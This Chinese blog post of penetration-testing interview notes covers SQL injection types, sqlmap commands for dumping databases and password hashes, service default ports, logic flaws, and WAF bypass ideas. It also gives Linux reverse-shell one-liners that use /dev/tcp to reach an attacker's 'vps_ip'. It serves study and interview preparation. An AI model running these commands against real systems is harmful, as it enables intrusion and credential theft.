<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.icon.jpg?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.icon.jpg?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.icon.jpg?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="leesinc1's blog" type="application/atom+xml" />






<meta name="description" content="Q0常见的SQL注入类型有哪些？并写出sqlmap检测SQL注入的命令？SQLMAPAPI怎么使用? 按注入点类型分类：  数字型注入：select * from 表名 where id=1 字符型注入：select * from 表名 where name=’admin’ 搜索型注入：select * from 表名 where 字段 like ‘%关键字%’  按提交的方式分类：  GET注入">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透测试面试">
<meta property="og:url" content="http://yoursite.com/2019/04/02/渗透测试面试/index.html">
<meta property="og:site_name" content="leesinc1&#39;s blog">
<meta property="og:description" content="Q0常见的SQL注入类型有哪些？并写出sqlmap检测SQL注入的命令？SQLMAPAPI怎么使用? 按注入点类型分类：  数字型注入：select * from 表名 where id=1 字符型注入：select * from 表名 where name=’admin’ 搜索型注入：select * from 表名 where 字段 like ‘%关键字%’  按提交的方式分类：  GET注入">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-04-02T15:01:58.593Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="渗透测试面试">
<meta name="twitter:description" content="Q0常见的SQL注入类型有哪些？并写出sqlmap检测SQL注入的命令？SQLMAPAPI怎么使用? 按注入点类型分类：  数字型注入：select * from 表名 where id=1 字符型注入：select * from 表名 where name=’admin’ 搜索型注入：select * from 表名 where 字段 like ‘%关键字%’  按提交的方式分类：  GET注入">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/04/02/渗透测试面试/"/>





  <title>渗透测试面试 | leesinc1's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">leesinc1's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/04/02/渗透测试面试/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="leesinc1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/leesinc1.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="leesinc1's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">渗透测试面试</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-02T23:01:19+08:00">
                2019-04-02
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2019/04/02/渗透测试面试/" class="leancloud_visitors" data-flag-title="渗透测试面试">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1,062
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Q0"><a href="#Q0" class="headerlink" title="Q0"></a>Q0</h2><p>常见的SQL注入类型有哪些？并写出sqlmap检测SQL注入的命令？SQLMAPAPI怎么使用?</p>
<p>按注入点类型分类：</p>
<ul>
<li>数字型注入：select * from 表名 where id=1</li>
<li>字符型注入：select * from 表名 where name=’admin’</li>
<li>搜索型注入：select * from 表名 where 字段 like ‘%关键字%’</li>
</ul>
<p>按提交的方式分类：</p>
<ul>
<li>GET注入</li>
<li>POST注入</li>
<li>COOkie注入：HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。</li>
</ul>
<p>按执行效果来分类：</p>
<ul>
<li>基于布尔的盲注</li>
<li>基于时间的盲注</li>
<li>基于报错的注入</li>
<li>可联合查询注入</li>
<li>堆查询注入</li>
</ul>
<h3 id="SQLmap"><a href="#SQLmap" class="headerlink" title="SQLmap"></a>SQLmap</h3><p>检测注入点是否可用</p>
<ul>
<li>python sqlmap.py -u “http:xxx”</li>
<li>加  –batch  //自动输入询问语句</li>
</ul>
<p>暴库</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ –dbs</li>
</ul>
<p>web当前使用的数据库</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ –current-db</li>
</ul>
<p>web数据库使用账户</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ –current-user</li>
</ul>
<p>列出sqlsever所有用户</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ –users</li>
</ul>
<p>数据库账户与密码</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ –passwords</li>
</ul>
<p>数据库中的表</p>
<ul>
<li>python sqlmap.py -u “<a href="http://192.168.1.150/products.asp?id=134" target="_blank" rel="external">http://192.168.1.150/products.asp?id=134</a>“ -D 数据库名称 –tables</li>
</ul>
<h3 id="SQLMAPAPI"><a href="#SQLMAPAPI" class="headerlink" title="SQLMAPAPI"></a>SQLMAPAPI</h3><p>sqlmapapi.py就是提供了一个检查sql注入的接口，我们可以直接通过发送http请求扫描sql注入，获取扫描结果等一系列操作。</p>
<h2 id="Q1"><a href="#Q1" class="headerlink" title="Q1."></a>Q1.</h2><p>Mongodb、redis、websphere、rsync服务简介和默认运行端口</p>
<p>Mongodb：MongoDB是一个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。</p>
<p>redis：Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。</p>
<p>websphere</p>
<p>rsync：rsync　命令是一个远程同步工具，可以通过AN\WAN快速同步多台主机间的文件，它使用的就是rsync算法达到本地和远程两个主机之间文件同步，该算法是增量算法，即只同步两个文件的不同部分，而不是每次同步整个文件，所以速度是相当快，默认端口873(TCP)</p>
<h2 id="Q2"><a href="#Q2" class="headerlink" title="Q2."></a>Q2.</h2><p>写出你知道的逻辑漏洞</p>
<p>登录缺陷，账户认证缺陷，会话管理缺陷，权限管理缺陷，支付逻辑缺陷，API缺陷</p>
<h2 id="Q3"><a href="#Q3" class="headerlink" title="Q3."></a>Q3.</h2><p>列举Linux的反弹shell的一些方法</p>
<h3 id="bash"><a href="#bash" class="headerlink" title="bash"></a>bash</h3><ul>
<li>bash -i &gt;&amp; /dev/tcp/vps_ip/端口号 0&gt;&amp;1</li>
</ul>
<p>bash -i 生成一个交互式的子进程</p>
<p>&amp;表示在Linux后台运行</p>
<p>/dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接</p>
<p>/dev/[tcp|upd]/host/port是Linux里面比较特殊的文件，读取和写入相当于建立一个socket调用</p>
<p>0是标准输入，1是标准输出，2是错误输出，0&gt;&amp;1表示将标准输入重定向到标准输出，0&gt;1表示将标准输入重定向到文件名为1的文件，&amp;是用来区分的标识符（Linux默认不会把错误信息重定向到文件的</p>
<p>举个栗子， command &gt;file 2&gt;&amp;1表示将标准输出重定向到file，然后错误输出重定向到标准输出，也就是又定向到了file，所以最后，标准输出和错误输出都定向到了file</p>
<h3 id="exec"><a href="#exec" class="headerlink" title="exec"></a>exec</h3><p>主机监听，靶机命令执行</p>
<p>exec 5&lt;&gt; /dev/tcp/vps_ip/端口号</p>
<p>cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&5; done</p>
<p>成功getshell</p>
<h2 id="Q4"><a href="#Q4" class="headerlink" title="Q4."></a>Q4.</h2><p>针对SQL注入，写出你所知道的Bypass WAF的可能的方式</p>
<p>a) 大小写混合</p>
<p>b)替换关键字</p>
<p>c)使用编码</p>
<p>d)使用注释</p>
<p>e)等价函数与命令</p>
<p>f)特殊符号</p>
<p>g)HTTP参数控制</p>
<p>h)缓冲区溢出</p>
<p>i)整合绕过</p>
<p>6.写出任意一种漏洞检测代码，用python实现</p>
<p>7.简述XXE的基本原理，以及如何去检测或者判断Blind XXE的存在</p>
<p>8.简述针对一个网站的渗透测试思路</p>
<p>9.针对Web扫描器的爬虫，你怎么看</p>
<p>10.简述PHP中造成任意文件下载漏洞的常见函数，以及造成漏洞的原因</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/30/笔记/" rel="next" title="笔记">
                <i class="fa fa-chevron-left"></i> 笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/uploads/leesinc1.jpg"
                alt="leesinc1" />
            
              <p class="site-author-name" itemprop="name">leesinc1</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/leesinc1" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="http://weibo.com/5785393846/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="Sina">
                    
                      <i class="fa fa-fw fa-sina"></i>Sina</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://oj.xctf.org.cn/web/login/?next=/" title="XCTF" target="_blank">XCTF</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.shiyanbar.com/ctf/practice/" title="实验吧" target="_blank">实验吧</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://orzk.github.io/" title="Orzk" target="_blank">Orzk</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
		<div id="music163player">
    <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=230 height=86 src="//music.163.com/outchain/player?type=2&id=521792&auto=0&height=66">
    </iframe>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Q0"><span class="nav-number">1.</span> <span class="nav-text">Q0</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQLmap"><span class="nav-number">1.1.</span> <span class="nav-text">SQLmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQLMAPAPI"><span class="nav-number">1.2.</span> <span class="nav-text">SQLMAPAPI</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q1"><span class="nav-number">2.</span> <span class="nav-text">Q1.</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q2"><span class="nav-number">3.</span> <span class="nav-text">Q2.</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q3"><span class="nav-number">4.</span> <span class="nav-text">Q3.</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#bash"><span class="nav-number">4.1.</span> <span class="nav-text">bash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exec"><span class="nav-number">4.2.</span> <span class="nav-text">exec</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q4"><span class="nav-number">5.</span> <span class="nav-text">Q4.</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">leesinc1</span>
<!--
   
-->
</div>
<div class="powered-by">
<span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</div>
<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>



-->
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共19.9k字</span>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("qkUq4Wh6OFO01jjgwqKgqdpy-gzGzoHsz", "EC8ipA5lRjhSYPTdGK2rYdGy");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
  

  

  

  

</body>
</html>
